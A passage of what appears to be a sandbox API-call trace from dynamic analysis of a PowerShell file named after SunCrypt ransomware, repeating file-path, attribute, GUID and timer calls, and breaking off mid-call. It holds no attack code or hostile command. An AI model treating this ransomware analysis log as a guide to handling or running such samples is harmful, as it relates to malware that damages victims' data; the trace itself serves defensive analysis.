lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.192] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701700894174) returned 1 [0104.192] EtwEventActivityIdControl () returned 0x0 [0104.193] EtwEventActivityIdControl () returned 0x0 [0104.193] EtwEventActivityIdControl () returned 0x0 [0104.193] EtwEventActivityIdControl () returned 0x0 [0104.193] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbf2ae368, Data2=0xa8e1, Data3=0x4105, Data4=([0]=0x8e, [1]=0xb1, [2]=0xf6, [3]=0x5b, [4]=0xc6, [5]=0x1a, [6]=0xc5, [7]=0x20))) returned 0x0 [0104.193] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.194] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701701018630) returned 1 [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.195] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701701183492) returned 1 [0104.195] EtwEventActivityIdControl () returned 0x0 [0104.195] EtwEventActivityIdControl () returned 0x0 [0104.195] EtwEventActivityIdControl () returned 0x0 [0104.196] EtwEventActivityIdControl () returned 0x0 [0104.196] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xfe51d7cc, Data2=0xc7a5, Data3=0x4abf, Data4=([0]=0x91, [1]=0x18, [2]=0xdd, [3]=0x3e, [4]=0xa0, [5]=0xf9, [6]=0xbc, [7]=0x60))) returned 0x0 [0104.196] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.196] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701701302730) returned 1 [0104.196] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.197] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.198] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701701453941) returned 1 [0104.198] EtwEventActivityIdControl () returned 0x0 [0104.198] EtwEventActivityIdControl () returned 0x0 [0104.198] EtwEventActivityIdControl () returned 0x0 [0104.198] EtwEventActivityIdControl () returned 0x0 [0104.198] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1ffe71f3, Data2=0x9963, Data3=0x46ec, Data4=([0]=0xa6, [1]=0x46, [2]=0x82, [3]=0xae, [4]=0x6f, [5]=0x33, [6]=0x2e, [7]=0xf6))) returned 0x0 [0104.199] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.199] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701701584424) returned 1 [0104.199] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.199] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.200] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.202] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701701840113) returned 1 [0104.202] EtwEventActivityIdControl () returned 0x0 [0104.202] EtwEventActivityIdControl () returned 0x0 [0104.202] EtwEventActivityIdControl () returned 0x0 [0104.202] EtwEventActivityIdControl () returned 0x0 [0104.202] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb38ab03e, Data2=0xa8e, Data3=0x428b, Data4=([0]=0x83, [1]=0x81, [2]=0x33, [3]=0x87, [4]=0x7d, [5]=0x38, [6]=0xd, [7]=0x80))) returned 0x0 [0104.203] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.203] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701701982584) returned 1 [0104.203] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.203] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.203] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.206] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701702222377) returned 1 [0104.206] EtwEventActivityIdControl () returned 0x0 [0104.206] EtwEventActivityIdControl () returned 0x0 [0104.206] EtwEventActivityIdControl () returned 0x0 [0104.212] EtwEventActivityIdControl () returned 0x0 [0104.212] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa9cb5d96, Data2=0x4d92, Data3=0x42c9, Data4=([0]=0xaa, [1]=0x25, [2]=0x67, [3]=0x18, [4]=0x8, [5]=0x2b, [6]=0x3e, [7]=0x8a))) returned 0x0 [0104.213] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.213] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701702965478) returned 1 [0104.213] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.213] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.213] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.213] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.214] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.218] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701703443061) returned 1 [0104.218] EtwEventActivityIdControl () returned 0x0 [0104.218] EtwEventActivityIdControl () returned 0x0 [0104.218] EtwEventActivityIdControl () returned 0x0 [0104.218] EtwEventActivityIdControl () returned 0x0 [0104.218] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x5535cf67, Data2=0x72d9, Data3=0x4d0d, Data4=([0]=0xa2, [1]=0x84, [2]=0xa8, [3]=0x98, [4]=0xa3, [5]=0x54, [6]=0x4a, [7]=0xa3))) returned 0x0 [0104.219] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.219] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701703565095) returned 1 [0104.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.219] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.221] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701703731784) returned 1 [0104.221] EtwEventActivityIdControl () returned 0x0 [0104.221] EtwEventActivityIdControl () returned 0x0 [0104.221] EtwEventActivityIdControl () returned 0x0 [0104.221] EtwEventActivityIdControl () returned 0x0 [0104.221] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc7ba67d0, Data2=0x9c8a, Data3=0x4f72, Data4=([0]=0x87, [1]=0x73, [2]=0xa4, [3]=0xa2, [4]=0x85, [5]=0xce, [6]=0xb7, [7]=0x49))) returned 0x0 [0104.222] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.222] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701703847454) returned 1 [0104.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.222] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.223] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701704005850) returned 1 [0104.224] EtwEventActivityIdControl () returned 0x0 [0104.224] EtwEventActivityIdControl () returned 0x0 [0104.224] EtwEventActivityIdControl () returned 0x0 [0104.224] EtwEventActivityIdControl () returned 0x0 [0104.224] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xe4b9f1f9, Data2=0xc4a6, Data3=0x48aa, Data4=([0]=0xa8, [1]=0xbb, [2]=0xcb, [3]=0x0, [4]=0x6b, [5]=0xd3, [6]=0x6b, [7]=0xc2))) returned 0x0 [0104.224] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.225] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701704118724) returned 1 [0104.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.225] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.227] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701704350555) returned 1 [0104.227] EtwEventActivityIdControl () returned 0x0 [0104.227] EtwEventActivityIdControl () returned 0x0 [0104.227] EtwEventActivityIdControl () returned 0x0 [0104.227] EtwEventActivityIdControl () returned 0x0 [0104.227] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xcb600600, Data2=0xa4d5, Data3=0x450c, Data4=([0]=0x97, [1]=0x5d, [2]=0x7d, [3]=0xa4, [4]=0xd0, [5]=0x83, [6]=0x6a, [7]=0x16))) returned 0x0 [0104.228] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.228] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701704469843) returned 1 [0104.228] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.228] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.228] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.229] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.229] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.233] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701705004059) returned 1 [0104.234] EtwEventActivityIdControl () returned 0x0 [0104.234] EtwEventActivityIdControl () returned 0x0 [0104.234] EtwEventActivityIdControl () returned 0x0 [0104.234] EtwEventActivityIdControl () returned 0x0 [0104.234] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x9f4a71ee, Data2=0x11fa, Data3=0x4591, Data4=([0]=0xa7, [1]=0x69, [2]=0x63, [3]=0x97, [4]=0x2f, [5]=0x6f, [6]=0x5b, [7]=0x25))) returned 0x0 [0104.235] GetEnvironmentVariableW (in: 